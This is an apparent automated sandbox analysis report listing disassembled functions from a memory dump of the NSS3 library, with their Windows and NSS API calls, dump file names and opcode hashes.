calloc.MOZGLUE(00000001,6C67072D,00000000,00000000,00000000,?,6C670725,00000000,00000058), ref: 6C668959
memset.VCRUNTIME140(?,00000000,?), ref: 6C668993
PR_Unlock.NSS3(?), ref: 6C6689AF

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: a1ba38289df7d56ed0bfd0b2d590c72ed24bff89f0dae4d2a12dd2bafa515d23
Instruction ID: 0c7f447e8fc2c558f27a79b152759f3e5fc721f678580ff4d6a8eee27be06812
Opcode Fuzzy Hash: a1ba38289df7d56ed0bfd0b2d590c72ed24bff89f0dae4d2a12dd2bafa515d23
Instruction Fuzzy Hash: CD312772E00211ABD7008F3ECC40A5A77A4AF0A35CF14822AEC1997F11E732E845C7DB

Function 6C65AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C65AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6C65AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C65AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6C65AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6C779500), ref: 6C65AF23

Part of subcall function 6C6AF080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C6AF0C8
Part of subcall function 6C6AF080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6AF122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C65AF37

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: aa0b69d19508e017992ee436edc047c13a3ceb2722508d6493ee90bb48e1864c
Instruction ID: 76d532f6dcbbb6a60217a3de15781c23c83e5a06c9322c4e4e5371c539a706b7
Opcode Fuzzy Hash: aa0b69d19508e017992ee436edc047c13a3ceb2722508d6493ee90bb48e1864c
Instruction Fuzzy Hash: 56213AB19092006BEB108F18DC41BAA7BE4AF8572CF644319FC54AB782E732D51587BF

Function 6C768A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6C768A8F

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

htons.WSOCK32(?), ref: 6C768ACB
PR_GetCurrentThread.NSS3(?), ref: 6C768AE2
htons.WSOCK32(?), ref: 6C768B1E
htonl.WSOCK32(7F000001,?), ref: 6C768B3B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: htons$CurrentModulePageSizeThreadhtonl
String ID:
API String ID: 3860140138-0
Opcode ID: c7203f0aed4ff09be10bb61510a614e86d91834fa83b863022521272884c092c
Instruction ID: 9b3706d999ae1da0f3d9f1252e8101d4c2623ab8d44f24e29e9a1361c56616b7
Opcode Fuzzy Hash: c7203f0aed4ff09be10bb61510a614e86d91834fa83b863022521272884c092c
Instruction Fuzzy Hash: A821BFA0D1474586C3208F368A45567B2F5AF96308B25DA2FECDD97E10F73094C4D3A5

Function 6C6DEE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6DEE85
realloc.MOZGLUE(480F8E0B,?), ref: 6C6DEEAE
PORT_Alloc_Util.NSS3(?), ref: 6C6DEEC5

Part of subcall function 6C6B0BE0: malloc.MOZGLUE(6C6A8D2D,?,00000000,?), ref: 6C6B0BF8
Part of subcall function 6C6B0BE0: TlsGetValue.KERNEL32(6C6A8D2D,?,00000000,?), ref: 6C6B0C15

htonl.WSOCK32(?), ref: 6C6DEEE3
htonl.WSOCK32(00000000,?), ref: 6C6DEEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6C6DEF01

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: b5986fb3c061f71d80fb6bf1c7899f0a1a922aff16bf67deae3f716e92876cab
Instruction ID: c935de0a551343cf15088d4e7650486b74cf4b0846231a25548422a6cf3a3da1
Opcode Fuzzy Hash: b5986fb3c061f71d80fb6bf1c7899f0a1a922aff16bf67deae3f716e92876cab
Instruction Fuzzy Hash: 7021D371A002159FCF109F28DC8479AB7A4EF89358F158179EC199B641E730FC15CBEA

Function 6C68EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C68EE49

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C68EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C68EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C68EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C68EEB3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: e078dbc3a9a7fec5d4538e76caa6fecef3a4990a4c6f1ee1541df9b13bf24d4b
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 112157BAA002146BEB108F58DC85EAB77A8EF06708F040564FE049B302E771DC15C7FA

Function 6C6B0AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6C667F62,00000000,00000000,?,?,?,6C6680DD), ref: 6C6B0AAE
PL_HashTableDestroy.NSS3(?,?,?,6C667F62,00000000,00000000,?,?,?,6C6680DD), ref: 6C6B0ACA
PL_HashTableDestroy.NSS3(?,?,?,6C667F62,00000000,00000000,?,?,?,6C6680DD), ref: 6C6B0B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6C667F62,00000000,00000000,?,?,?,6C6680DD), ref: 6C6B0B24
free.MOZGLUE(?,?,?,6C667F62,00000000,00000000,?,?,?,6C6680DD), ref: 6C6B0B3C
memset.VCRUNTIME140(6C7B24E4,00000000,000005B0,?,?,6C667F62,00000000,00000000,?,?,?,6C6680DD), ref: 6C6B0BC2

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: 16dbde227384913f103c8efc57e01928689dfd934c264a5c9cbdec6061788f28
Instruction ID: 4fcb346d000d5a0076f9b97861936b9930ca549a789339b4463bb35f7eb1a569
Opcode Fuzzy Hash: 16dbde227384913f103c8efc57e01928689dfd934c264a5c9cbdec6061788f28
Instruction Fuzzy Hash: CB21F7F0B022419AEF90DF6A9D0DF027AB8B70638CF114535D829E2E41E7359D588B5E

Function 6C6A8A60 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C6561C4,?,6C655F9C,00000000), ref: 6C6A8A81
TlsGetValue.KERNEL32(?,?,?,6C655F9C,00000000), ref: 6C6A8A9E
EnterCriticalSection.KERNEL32(?,?,?,?,6C655F9C,00000000), ref: 6C6A8AB7
PR_Unlock.NSS3(?,?,?,?,?,6C655F9C,00000000), ref: 6C6A8AD2
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C655F9C,00000000), ref: 6C6A8B05
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,6C655F9C,00000000), ref: 6C6A8B18

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CondNotifyValue$CriticalEnterSectionUnlock
String ID:
API String ID: 1007705821-0
Opcode ID: 15768bc3d71cfdda4fb1dccb8894e399998119901400186b242c1b6a73e240f4
Instruction ID: 17ca0e22af0acfdf96f548f232d4488cde3a6fd6b5ab1c9d21f607a45d5209ba
Opcode Fuzzy Hash: 15768bc3d71cfdda4fb1dccb8894e399998119901400186b242c1b6a73e240f4
Instruction Fuzzy Hash: B02182B0504741CBDB10AFB8C044759BBF0FF09348F058A2AD99587B11E730EC95CB9A

Function 6C6A4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C6A4EB8,?), ref: 6C6A4884

Part of subcall function 6C6A8800: TlsGetValue.KERNEL32(?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8821
Part of subcall function 6C6A8800: TlsGetValue.KERNEL32(?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A883D
Part of subcall function 6C6A8800: EnterCriticalSection.KERNEL32(?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8856
Part of subcall function 6C6A8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6A8887
Part of subcall function 6C6A8800: PR_Unlock.NSS3(?,?,?,?,6C6B085A,00000000,?,6C658369,?), ref: 6C6A8899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6A4EB8,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6A4EB8,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6678F8), ref: 6C6A4899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A48A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A48B8

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 0da4534cf011ec4049421994a7a72ec5f9dbdcc37746c25f0c0f9d72fe285981
Instruction ID: 47e4246a9801833d298516420d8222d2ad82e45447a82e0f31272088f3e5fd0f
Opcode Fuzzy Hash: 0da4534cf011ec4049421994a7a72ec5f9dbdcc37746c25f0c0f9d72fe285981
Instruction Fuzzy Hash: 6F21F672F00240ABEF045FE5FC84966B7B8EF0B3597141534DE1947A02EF61EC1687A9

Function 6C6689E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6688AE,-00000008), ref: 6C668A04
EnterCriticalSection.KERNEL32(?), ref: 6C668A15
memset.VCRUNTIME140(6C6688AE,00000000,00000132), ref: 6C668A27
PR_Unlock.NSS3(?), ref: 6C668A35
memset.VCRUNTIME140(6C6688AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C6688AE,-00000008), ref: 6C668A45
free.MOZGLUE(6C6688A6,?,6C6688AE,-00000008), ref: 6C668A4E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 352097ef70635ac1863b89238c13a3cc20058097ca089dae61ce202594a2ee78
Instruction ID: cedd8de8703ed607a1f40011449b55ac32348b3308d4ed61ca4c86e6f3e5d3de
Opcode Fuzzy Hash: 352097ef70635ac1863b89238c13a3cc20058097ca089dae61ce202594a2ee78
Instruction Fuzzy Hash: DA110BB5E00301ABEB009F7ADC44AAAB778FF0A358F000575ED1496A11E732D55487E6

Function 6C668A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 6C668FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C670710), ref: 6C668FF1
Part of subcall function 6C668FE0: calloc.MOZGLUE(00000001,00000000,?,?,6C670710), ref: 6C66904D
Part of subcall function 6C668FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C670710), ref: 6C669066
Part of subcall function 6C668FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C670710), ref: 6C669078

TlsGetValue.KERNEL32 ref: 6C668AC1
EnterCriticalSection.KERNEL32 ref: 6C668AD6
PL_FinishArenaPool.NSS3 ref: 6C668AE5
PR_Unlock.NSS3 ref: 6C668AF7
DeleteCriticalSection.KERNEL32 ref: 6C668B02
free.MOZGLUE ref: 6C668B0E

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
String ID:
API String ID: 417085867-0
Opcode ID: 177215d54ed2cba136c1361067de897f4f00a5b0ce7d7254c34b76a345070ea5
Instruction ID: 6c2a3c8ee7c8140faa8cf18ce91357f9a9fa1b5102e29436e51af7996b073e2c
Opcode Fuzzy Hash: 177215d54ed2cba136c1361067de897f4f00a5b0ce7d7254c34b76a345070ea5
Instruction Fuzzy Hash: EF116AB15046059BDB00BF79D08966ABBF4FF06348F01856AD88487A10EB35D499CB9A

Function 6C768910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C76892E

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

PR_Lock.NSS3 ref: 6C768950

Part of subcall function 6C719BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C641A48), ref: 6C719BB3
Part of subcall function 6C719BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C641A48), ref: 6C719BC8

getprotobynumber.WSOCK32(?), ref: 6C768959
GetLastError.KERNEL32(?), ref: 6C768967
PR_GetCurrentThread.NSS3(?,?), ref: 6C76896F
PR_Unlock.NSS3(?,?), ref: 6C76898A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: f2ff634854ade03274779144d70019684a6b2f934ae92173bac2acc45ec3896d
Instruction ID: cd46e5d386f74774d536dfe6fc6d5fd102a2b285b41ffce13ea0b546eb6fc995
Opcode Fuzzy Hash: f2ff634854ade03274779144d70019684a6b2f934ae92173bac2acc45ec3896d
Instruction Fuzzy Hash: 7B11E972E141209BCB105F7A9A0854A7B68EF47378F094376DC0697F61D7318C05C7DA

Function 6C66AB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6C671397,5B5F5EC0,?,?,6C66B1EE,2404110F,?,?), ref: 6C66AB3C
free.MOZGLUE(D958E836,?,6C66B1EE,2404110F,?,?), ref: 6C66AB49
DeleteCriticalSection.KERNEL32(5D5E6C86), ref: 6C66AB5C
free.MOZGLUE(5D5E6C7A), ref: 6C66AB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C66AB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C66AB76

Part of subcall function 6C69F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C69F854
Part of subcall function 6C69F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C69F868
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C69F882
Part of subcall function 6C69F820: free.MOZGLUE(04C483FF,?,?), ref: 6C69F889
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C69F8A4
Part of subcall function 6C69F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C69F8AB
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C69F8C9
Part of subcall function 6C69F820: free.MOZGLUE(280F10EC,?,?), ref: 6C69F8D0

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: a2b6e0e470b3fc08bbc8db6abbcbaa880f4f02606e6b72a3e37ff3a625a9df1c
Instruction ID: da7e22561f2a353afc536e3836c5e85284e21042b1a3752e840eff162b4c1d7f
Opcode Fuzzy Hash: a2b6e0e470b3fc08bbc8db6abbcbaa880f4f02606e6b72a3e37ff3a625a9df1c
Instruction Fuzzy Hash: 540175B2600616BBDB019FB5EC4489B73B8FA4573A3040529E91943A01D737F456D7E6

Function 6C6E6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C6EAA9B,?,?,?,?,?,?,?,00000000,?,6C6E80C1), ref: 6C6E6846

Part of subcall function 6C641770: calloc.MOZGLUE(00000001,0000019C,?,6C6415C2,?,?,?,?,?,00000001,00000040), ref: 6C64178D

PR_NewMonitor.NSS3(00000000,?,6C6EAA9B,?,?,?,?,?,?,?,00000000,?,6C6E80C1), ref: 6C6E6855

